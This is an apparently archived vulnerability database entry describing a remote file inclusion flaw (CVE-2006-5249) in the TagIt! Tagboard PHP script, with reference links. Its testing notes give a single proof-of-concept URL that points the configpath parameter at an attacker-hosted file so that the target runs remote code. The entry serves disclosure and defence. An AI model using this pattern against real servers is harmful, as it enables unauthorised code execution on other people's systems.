TagIt! Tagboard (tagit2b) tagmin/delTagUser.php configpath Variable Remote File Inclusion

2006-10-10T01:12:05
ID OSVDB:30858
Type osvdb
Reporter OSVDB
Modified 2006-10-10T01:12:05

Description

Manual Testing Notes

http://[target]/tagit2b/tagmin/delTagUser.php?configpath=http://[attacker]/cmd.do?

References:

Security Tracker: 1017045 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0146.html Mail List Post: http://www.attrition.org/pipermail/vim/2006-October/001083.html ISS X-Force ID: 29430 CVE-2006-5249 Bugtraq ID: 20451